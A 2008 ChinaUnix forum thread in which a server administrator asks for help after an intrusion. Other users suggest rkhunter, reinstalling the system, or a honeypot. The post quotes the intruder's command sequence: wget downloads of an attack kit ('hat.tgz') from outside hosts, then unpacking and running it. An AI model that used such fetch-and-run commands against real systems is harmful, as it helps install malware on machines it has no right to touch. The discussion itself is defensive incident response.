免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1473 | 回复: 4
打印 上一主题 下一主题

被黑了,谁能帮出我 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2008-01-31 16:31 |只看该作者 |倒序浏览
今天察看服务器发现有来历不明的ip地址访问了服务器并且获取了一个用户(user)的权限
执行了下面几个命令
uname -a
cd /tmp
cran -r
w
wget roshells。100free。com/hat。tgz
wget geocities。com/部csthief。cgi/hat。tgz
解压上面文件
tar zxvf hat。tgz
。/hat
ftp
(大概这么多)
用root修改user密码无法登陆了
请教大家该怎么处理此问题
谢谢

论坛徽章:
0
2 [报告]
发表于 2008-01-31 16:46 |只看该作者
先试试用rkhunter查一下吧。
最好还是重装算了。

论坛徽章:
0
3 [报告]
发表于 2008-01-31 16:51 |只看该作者
就怕重装了以后又被黑

论坛徽章:
0
4 [报告]
发表于 2008-01-31 17:06 |只看该作者
对待history都不擦掉的小混混,怕什么!
而且他拿到的又非root权限,他这个帐号关联什么服务吗?关系到某些人的文件吗?如果不是,那应该没什么危害了。

建议搞个蜜罐(简单点可以换个shell给他)玩玩他。

论坛徽章:
0
5 [报告]
发表于 2008-01-31 18:36 |只看该作者
非root权限没有事,你查一下他通过什么获得的权限
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP